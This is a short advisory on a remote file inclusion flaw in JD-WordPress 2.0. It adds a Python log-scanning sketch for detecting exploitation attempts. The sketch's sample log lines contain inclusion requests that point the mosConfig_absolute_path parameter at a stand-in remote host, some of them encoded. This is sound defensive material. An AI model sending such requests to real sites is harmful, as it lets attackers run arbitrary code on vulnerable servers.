JD-WordPress 2.0 RC2 - Remote file inclusion


Software: JD WordPress
Versions: 2.0
Disclosure date: 2009-10-19
CVE: CVE-N/A
Classification: Remote File Inclusion


Details

The vulnerabilities in JD-WordPress allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) wp-comments-post.php, (2) wp-feed.php, or (3) wp-trackback.php.
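
A detection sketch for the issue described above, added here as an example and not part of the original advisory: it scans web access log lines for requests to the three affected scripts in which mosConfig_absolute_path carries a URL, including percent-encoded and double-encoded values. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameter named in the advisory.
AFFECTED = {"wp-comments-post.php", "wp-feed.php", "wp-trackback.php"}
PARAM = "mosConfig_absolute_path"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with scheme:// (http, https, ftp, php, ...) or //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)


def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(lines):
    """Return (line_number, script, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        script = target.path.rsplit("/", 1)[-1].lower()
        if script not in AFFECTED:
            continue
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            value = fully_unquote(value)
            if key == PARAM and REMOTE_RE.match(value):
                hits.append((number, script, value))
    return hits


# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Oct/2009:10:00:01 +0000] "GET /blog/wp-feed.php?mosConfig_absolute_path=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [19/Oct/2009:10:00:02 +0000] "GET /blog/wp-feed.php?feed=rss2 HTTP/1.1" 200 4096',
    '198.51.100.9 - - [19/Oct/2009:10:00:03 +0000] "POST /blog/wp-trackback.php?mosConfig_absolute_path=ftp%253A%252F%252Fexample.invalid%252Fx HTTP/1.1" 200 12',
    '198.51.100.9 - - [19/Oct/2009:10:00:04 +0000] "GET /blog/index.php?mosConfig_absolute_path=http://example.invalid/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a value sent in a POST body will not appear here and needs request-body logging or a WAF rule to be seen.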

Solution

Update WordPress.
